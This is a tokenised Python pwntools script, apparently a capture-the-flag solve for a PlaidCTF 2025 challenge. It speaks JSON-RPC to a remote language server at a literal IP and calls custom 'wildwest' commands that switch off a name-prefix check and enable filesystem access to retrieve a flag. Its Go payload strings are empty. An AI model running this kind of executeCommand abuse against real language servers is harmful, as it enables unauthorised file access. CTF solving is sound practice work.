from
pwn
import
*
import
time
import
json
import
socket
from
typing
import
Dict
,
Any
class
SimpleLSClient:
def
__init__(
self
, host:
str
=
'localhost'
, port:
int
=
9999
):
self
.host
=
host
self
.port
=
port
self
.socket
=
None
self
.request_id
=
0
context.log_level
=
'debug'
def
connect(
self
):
try
:
self
.socket
=
remote(
self
.host,
self
.port)
except
Exception as e:
print
(f
"连接失败: {e}"
)
def
disconnect(
self
):
if
self
.socket:
self
.socket.close()
print
(
"连接已关闭"
)
def
build_request(
self
, method:
str
, params:
Dict
[
str
,
Any
]
=
None
)
-
>
str
:
self
.request_id
+
=
1
request
=
{
"jsonrpc"
:
"2.0"
,
"id"
:
self
.request_id,
"method"
: method,
"params"
: params
or
{}
}
content
=
json.dumps(request)
header
=
f
"Content-Length: {len(content)}\r\n\r\n"
return
header
+
content
def
send_request(
self
, method:
str
, params:
Dict
[
str
,
Any
]
=
None
)
-
>
Dict
[
str
,
Any
]:
if
not
self
.socket:
raise
ConnectionError(
"未连接到服务器"
)
request
=
self
.build_request(method, params)
self
.socket.send(request.encode(
'utf-8'
))
response
=
self
.receive_response()
return
response
def
receive_response(
self
)
-
>
Dict
[
str
,
Any
]:
header
=
""
while
'\r\n\r\n'
not
in
header:
header
+
=
self
.socket.recv(
1
).decode(
'utf-8'
)
content_length
=
int
(header.split(
'Content-Length: '
)[
1
].split(
'\r\n'
)[
0
])
content
=
b""
while
len
(content) < content_length:
content
+
=
self
.socket.recv(content_length
-
len
(content))
return
json.loads(content.decode())
def
make_initialize_request(client):
init_params
=
{
"processId"
:
None
,
"rootUri"
:
"file:///mnt/e/CTF/plaidctf2025/sheriff_says"
,
"capabilities"
: {
"textDocument"
: {
"Completion"
: {
"CompletionItem"
: {
"sSnippetSupport"
:
True
}
}
}
},
"clientinfo"
:{
"name"
:
"neovim"
,
'version'
:
"1"
}
}
response
=
client.send_request(
"initialize"
, init_params)
print
(
"Initialize 响应:"
, json.dumps(response, indent
=
2
))
def
make_did_open_request(client,code):
did_open_params
=
{
"textDocument"
: {
"uri"
:
"file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go"
,
"text"
: code
}
}
response
=
client.send_request(
"textDocument/didOpen"
, did_open_params)
print
(
"DidOpen 响应:"
, json.dumps(response, indent
=
2
))
def
make_did_change_request(client,code):
did_change_params
=
{
"textDocument"
: {
"uri"
:
"file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go"
,
},
"contentChanges"
: [
{
"text"
: code
}
]
}
response
=
client.send_request(
"textDocument/didChange"
, did_change_params)
print
(
"DidChange 响应:"
, json.dumps(response, indent
=
2
))
def
make_execute_command_request(client,command,args):
print
(command)
execute_command_params
=
{
"command"
: command,
"arguments"
: args
}
response
=
client.send_request(
"workspace/executeCommand"
, execute_command_params)
print
(
"ExecuteCommand 响应:"
, json.dumps(response, indent
=
2
))
go_code
=
go_rename_code
=
def
main():
client
=
SimpleLSClient(
'54.221.151.72'
,
7010
)
client.connect()
client2
=
SimpleLSClient(
'54.221.151.72'
,
7010
)
client2.connect()
make_initialize_request(client)
make_did_open_request(client, go_code)
make_did_change_request(client, go_rename_code)
make_execute_command_request(client,
"wildwest.loadNewConfig"
, [
{
"EnforcePrefix"
:
False
,
"RequiredPrefix"
:
"sheriff_says_a"
,
"MinimumNameLength"
:
1
,
"UseFileSystem"
:
True
},
0
,
0
])
make_execute_command_request(client,
"wildwest.quickDraw"
,[
'flag'
,
0.0
,''])
make_initialize_request(client2)
print
(client.socket.recv())
client.socket.interactive()
if
__name__
=
=
"__main__"
:
main()